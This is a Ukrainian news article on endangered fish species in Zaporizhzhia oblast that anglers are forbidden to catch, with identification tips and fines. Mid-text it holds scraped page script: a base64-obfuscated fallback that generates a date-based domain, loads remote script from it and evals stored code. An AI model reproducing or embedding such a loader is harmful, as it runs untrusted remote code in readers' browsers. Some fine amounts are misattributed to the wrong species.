До уваги рибалок: які зникаючі види риб у Запорізькій області заборонено ловити

Переважна більшість рибалок-любителів знає, що відповідно до Правил любительського і спортивного рибальства на водоймах загального користування добова норма вилову риби на одну особу становить 3 кг, а раків не більше – 30 екз. Разом з цим, варто зауважити, що Правилами також передбачені види риб, які взагалі заборонені до вилову тому що знаходяться під загрозою зникнення. Розглянемо вразливі та зникаючі види риб, які ще можна зустріти у внутрішніх водоймах Запорізької області.

Рибець звичайний

В Україні повсюдно скорочується чисельність цього виду. В основному через зарегульований стік річок і знищення реофільних ділянок. У середньому Дніпрі певний час вважався зниклим. Зараз зрідка трапляється в уловах рибалок-любителів по всій території України, у тому числі в басейні середнього Дніпра. Даний вид заборонений до вилову згідно п. 4.10 Правил любительського і спортивного рибальства, а відповідно до такс для обчислення розміру відшкодування шкоди, заподіяної внаслідок незаконного добування (збирання) або знищення цінних видів водних біоресурсів, збиток за кожен виловлений екземпляр складає 255 грн.

Біологічні особливості:

Рибець звичайний (Vimba vimba) – вид риб родини коропових. Тіло цієї риби помірно видовжене, досить високе, стиснуте з боків. Рот маленький, нижній. Рило довге, м’ясисте. За спинним плавцем є вкритий лускою кіль. Спинний бік темно-сірий, попелястий з синюватим або зеленкуватим вилиском, боки сірувато-сріблясті, черево сріблясто-біле або біле. Спинний і хвостовий плавці сірі, всі інші безбарвні, іноді світло-сірі, блідно-жовті. Статевої зрілості досягає у віці 3-4 років при довжині тіла 17-20 см. Під час розмноження верхня третина тіла рибця робиться майже чорною, боки темно-сріблястими, черево білим з червоним, оранжевим або яскраво жовтим вилиском, спинний і хвостовий плавці чорними, всі інші плавці червоними або оранжевими. У самців голова, спина і боки вкриваються дрібними конічними білуватими роговими горбками. Молодь живиться планктоном, поступово переходячи на бентос. Дорослі особини споживають черв’яків, личинок комах, молюсків, ракоподібних, водорості, вищу водну рослинність, іноді ікру й дрібних риб.

Карась золотий

Природним аборигенним видом риб Запорізьких водойм є карась золотий або карась звичайний (Carassius carassius). Даний вид включений до Списку рідкісних риб Європи, до Червоної книги МСОП та Червоної книги України. Вважається, що у водосховищах його ассимілював карась сріблястий. Тому у водоймах, де певний час мешкають два види карася, золотого поглинає сріблястий, як більш пластичний вид. Популяції карася золотого зберіглися у локальних водоймах. Відповідно до додатку 1 до постанови КМУ від 7 листопада 2012р. № 1030 розмір компенсації за кожний екземпляр карася золотого становить 330 грн.

Біологічні особливості:

Як відрізнити червонокнижного золотого карася від сріблястого? Карась золотий має круглішу форму тіла, бронзово-золотисте забарвлення, хвостовий плавець менш виїмчастий, ніж у сріблястого. Черевні та грудні плавці злегка червонуваті, а у сріблястого жовтуваті або сірі. Луска в золотого карася гладенька, у сріблястого — більш шорстка.

Мешкає золотий карась у заплавних водоймах, озерах, ставках зі стоячою або слабопроточною водою та замуленим дном, яке густо заросло водяною рослинністю. Даний вид витривалий до кисневого режиму. Під час промерзання водойм і літнього висихання озер риба перебуває у мулі на глибині понад 0,5 м. Нереститься він у травні-липні. Статевої зрілості досягає у віці 2–3 років. Золотий карась живиться здебільшого бентосними організмами, а також зоопланктоном.

Як у Запоріжжі рибалки порушують розпорядження військової адміністрації (ВІДЕО) Судак волзький, Берш

Нечислений вид, який в межах Запорізької області біль-менш трапляється в уловах рибалок-любителів в акваторії Дніпровського водосховища. Основними причинами зміни чисельності є зникнення типових біотопів, особливо репродуктивних у результаті зміни гідрологічного, хімічного, біологічного режимів водойм, спричиненої гідротехнічним будівництвом та забрудненням води. Варто звернути увагу, що в Правилах любительського і спортивного рибальства вказаний мінімально дозволені до вилову розміри цієї риби, але Вид занесено до Червоної книги України, статус – зникаючий. Відповідно до додатку 1 до постанови КМУ від 7 листопада 2012р. № 1030 розмір компенсації за кожний екземпляр берша становить 660 грн.

Біологічні особливості:

Рибалкам-любителям щоб випадково не виловити червонокнижного берша, прийнявши його за судака, варто пам’яати, що берш має певні особливості і, завдяки яким його можна легко відрізнити від судака. У берша морда набагато коротша і ширша, зуби мають практично однакову величину, в нижній щелепі відсутні ікла, очі великі, на щоках є луска, і взагалі луска значно більша, ніж у судака. Забарвлення у берша і судака практично ідентичне, але смуги у берша чіткіші і мають правильну форму. За розмірами він значно менше судака.

З народження берш живиться дрібним зоопланктоном, а досягнувши довжини 40 мм і більше, переходить на харчування бентосом. Перехід на хиже харчування спостерігається у берша на другому році життя. Основна їжа його: цьогорічки коропових і окуневих риб. Берш більше розміром 15 см харчується виключно рибою. Берш не здатний захоплювати (через відсутність ікол) і заковтувати (вузьке горло) крупну здобич. Розмір жертви коливається від 0,5 до 7,5 см. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Ялець звичайний

В Україні раніше був поширений фактично в усіх великих річках, а також у проточних озерах і в дніпровських водосховищах. Ялець зараз фактично зник з руслової частини Дніпра і його водосховищ. Причини зменшення популяції — зникнення типових біотопів у результаті зміни гідрологічного, хімічного, біологічного режимів водойм, спричиненої гідротехнічним будівництвом, забрудненням води. Вид занесено до Червоної книги України, статус – вразливий. Відповідно до додатку 1 до постанови КМУ від 7 листопада 2012р. № 1030 розмір компенсації за кожний екземпляр берша становить 330 грн.

Біологічні особливості:

Тіло видовжене, низьке, ледь стиснуте з боків. Найбільша довжина тіла 20–25 см, зазвичай 10–15 см, маса до 100 г. Тривалість життя до 8 років. Спина темна, від темно-сірого або оливковозеленкуватого до чорного кольору, боки світло-сірі із сріблястим вилиском, черево світло-сріблясте. Спинний і хвостовий плавці сірі, грудні, черевні і анальний блідо-жовті або жовтувато-червоні, райдужка очей жовтувато-оранжева.

Бистрянка російська

З кінця 1970-х рр. постійно скорочує ареал. Причиною є знищення типових біотопів у результаті зміни гідрологічного, хімічного, біологічного режимів водойм, спричиненої випрямленням руслових ділянок, гідротехнічним будівництвом, а також забрудненням. В Червоній книзі України має статус – «зникаючий». Зникаючі — види це ті, які перебувають під загрозою зникнення у природних умовах і збереження їх є малоймовірним, якщо триватиме дія факторів, що негативно впливають на стан їх популяцій.

Занесена до списків Бернської конвенції і МСОП та Європейського червоного списку. Відповідно до додатку 1 до постанови КМУ від 7 листопада 2012р. № 1030 розмір компенсації за кожний екземпляр берша становить 660 грн.

Біологічні особливості:

Прісноводна зграйна риба, яка мешкає тільки в річках, на ділянках з помірною або швидкою течією і чистою, насиченою киснем водою, тяжіючи до придонних шарів. Статевозрілою стає у 2 роки. Тіло видовжене, досить високе, сплюснуте з боків. За основою черевних плавців починається не вкритий лускою кіль.Довжина тіла до 12–13 см, маса до 30 г, тривалість життя не перевищує 5–6 років. Спина даного виду — майже чорна з зеленкуватим або синюватим відтінком, боки синювато- або зеленкувато-сріблясті, черево сріблясто-біле. Вздовж бічної лінії подвійний ряд темних крапок-штрихів (подвійна «стрічка»). Черевні і анальний плавці при основі жовтуваті, червоні або сіруваті, при кінці безбарвні, всі інші плавці сірі або зеленкувато-сірі.

Якщо на гачок рибалки попалася заборонена для вилову риба, потрібно обережно зняти її з гачка та одразу ж відпустити її у водойму для того, щоб зберегти їй життя.

Довідкова інформація:

В Управлінні Державного агентства меліорації та рибного господарства у Запорізькій області функціонує «гаряча лінія»: (067)-622-04-66. Про порушення Правил любительського і спортивного рибальства, порядку придбання чи збуту водних біоресурсів прохання повідомляти за вказаним номером телефону.

Підписуйтесь на Акцент в

Фото: скріншот з відео Youtube-канал Геннадій Стрельцов (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/do-uvagi-ribalok-yaki-znikayuchi-vidi-rib-u-zaporizkij-oblasti-zaboroneno-loviti/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top